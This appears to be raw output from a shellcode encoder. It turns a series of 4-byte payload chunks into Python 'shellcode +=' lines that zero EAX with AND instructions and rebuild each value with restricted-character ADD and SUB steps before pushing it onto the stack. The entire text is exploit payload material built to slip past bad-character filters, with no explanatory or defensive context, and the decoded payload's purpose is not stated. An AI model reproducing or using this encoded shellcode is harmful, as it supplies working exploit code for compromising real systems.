[*] Encoding [3d1bea8b]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x46\x75\x16\x27" ## add  eax, 0x27167546
shellcode += "\x05\x45\x75\x05\x16" ## add  eax, 0x16057545
shellcode += "\x50"                 ## push eax
[*] Encoding [ecc9e8ff]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x77\x64\x64\x66" ## add  eax, 0x66646477
shellcode += "\x05\x66\x54\x54\x55" ## add  eax, 0x55545466
shellcode += "\x05\x55\x63\x44\x64" ## add  eax, 0x64446355
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [163211b1]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x61\x11\x22\x13" ## add  eax, 0x13221161
shellcode += "\x05\x52\x22\x21\x23" ## add  eax, 0x23212252
shellcode += "\x05\x31\x11\x22\x13" ## add  eax, 0x13221131
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [f12817b9]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x64\x14\x24\x71" ## add  eax, 0x71241464
shellcode += "\x05\x54\x23\x14\x62" ## add  eax, 0x62142354
shellcode += "\x05\x34\x13\x23\x51" ## add  eax, 0x51231334
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [1d89b7de]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x77\x63\x45\x17" ## add  eax, 0x17456377
shellcode += "\x05\x67\x54\x44\x06" ## add  eax, 0x06445467
shellcode += "\x50"                 ## push eax
[*] Encoding [051696df]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x67\x43\x13\x13" ## add  eax, 0x13134367
shellcode += "\x05\x66\x43\x23\x13" ## add  eax, 0x13234366
shellcode += "\x05\x45\x43\x13\x12" ## add  eax, 0x12134345
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [4de18ec9]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x65\x47\x71\x27" ## add  eax, 0x27714765
shellcode += "\x05\x64\x47\x70\x26" ## add  eax, 0x26704764
shellcode += "\x50"                 ## push eax
[*] Encoding [fd4a0d73]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x42\x16\x35\x76" ## add  eax, 0x76351642
shellcode += "\x05\x32\x16\x24\x66" ## add  eax, 0x66241632
shellcode += "\x05\x32\x14\x24\x54" ## add  eax, 0x54241432
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [485a9ff7]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x74\x47\x35\x34" ## add  eax, 0x34354774
shellcode += "\x05\x63\x46\x34\x24" ## add  eax, 0x24344663
shellcode += "\x05\x53\x45\x24\x23" ## add  eax, 0x23244553
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [9f06528a]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x45\x32\x13\x47" ## add  eax, 0x47133245
shellcode += "\x05\x44\x31\x13\x46" ## add  eax, 0x46133144
shellcode += "\x05\x34\x22\x13\x45" ## add  eax, 0x45132234
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [57c71f41]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x31\x17\x64\x34" ## add  eax, 0x34641731
shellcode += "\x05\x22\x26\x53\x33" ## add  eax, 0x33532622
shellcode += "\x05\x21\x15\x43\x23" ## add  eax, 0x23431521
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [66e7ca3a]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x25\x65\x73\x33" ## add  eax, 0x33736525
shellcode += "\x05\x15\x65\x74\x33" ## add  eax, 0x33746515
shellcode += "\x50"                 ## push eax
[*] Encoding [e464f601]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x11\x73\x33\x63" ## add  eax, 0x63337311
shellcode += "\x05\x12\x63\x32\x52" ## add  eax, 0x52326312
shellcode += "\x05\x11\x53\x32\x62" ## add  eax, 0x62325311
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [d3498faa]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x55\x47\x34\x62" ## add  eax, 0x62344755
shellcode += "\x05\x44\x46\x24\x62" ## add  eax, 0x62244644
shellcode += "\x05\x44\x35\x24\x42" ## add  eax, 0x42243544
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [522607c6]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x63\x03\x13\x31" ## add  eax, 0x31130363
shellcode += "\x05\x63\x04\x13\x21" ## add  eax, 0x21130463
shellcode += "\x50"                 ## push eax
[*] Encoding [c0b2412d]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x17\x21\x61\x60" ## add  eax, 0x60612117
shellcode += "\x05\x16\x20\x51\x60" ## add  eax, 0x60512016
shellcode += "\x50"                 ## push eax
[*] Encoding [2cde019d]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x46\x11\x66\x26" ## add  eax, 0x26661146
shellcode += "\x05\x46\x12\x65\x15" ## add  eax, 0x15651246
shellcode += "\x05\x44\x11\x46\x24" ## add  eax, 0x24461144
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [7b95529d]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x57\x31\x53\x36" ## add  eax, 0x36533157
shellcode += "\x05\x46\x21\x42\x45" ## add  eax, 0x45422146
shellcode += "\x50"                 ## push eax
[*] Encoding [4a70dbf8]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x74\x66\x41\x35" ## add  eax, 0x35416674
shellcode += "\x05\x64\x65\x31\x24" ## add  eax, 0x24316564
shellcode += "\x05\x53\x43\x31\x24" ## add  eax, 0x24314353
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [8988107a]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x45\x11\x44\x44" ## add  eax, 0x44441145
shellcode += "\x05\x34\x21\x44\x44" ## add  eax, 0x44442134
shellcode += "\x05\x34\x11\x33\x34" ## add  eax, 0x34331134
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [58748312]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x11\x42\x32\x34" ## add  eax, 0x34324211
shellcode += "\x05\x01\x41\x42\x24" ## add  eax, 0x24424101
shellcode += "\x50"                 ## push eax
[*] Encoding [78031278]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x34\x11\x02\x34" ## add  eax, 0x34021134
shellcode += "\x05\x44\x01\x01\x44" ## add  eax, 0x44010144
shellcode += "\x50"                 ## push eax
[*] Encoding [3152b1c9]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x65\x61\x31\x21" ## add  eax, 0x21316165
shellcode += "\x05\x64\x50\x21\x10" ## add  eax, 0x10215064
shellcode += "\x50"                 ## push eax
[*] Encoding [29e5985c]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x36\x54\x73\x15" ## add  eax, 0x15735436
shellcode += "\x05\x26\x44\x72\x14" ## add  eax, 0x14724426
shellcode += "\x50"                 ## push eax
[*] Encoding [b4bfe089]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x44\x61\x67\x63" ## add  eax, 0x63676144
shellcode += "\x05\x44\x51\x56\x52" ## add  eax, 0x52565144
shellcode += "\x05\x34\x61\x35\x32" ## add  eax, 0x32356134
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
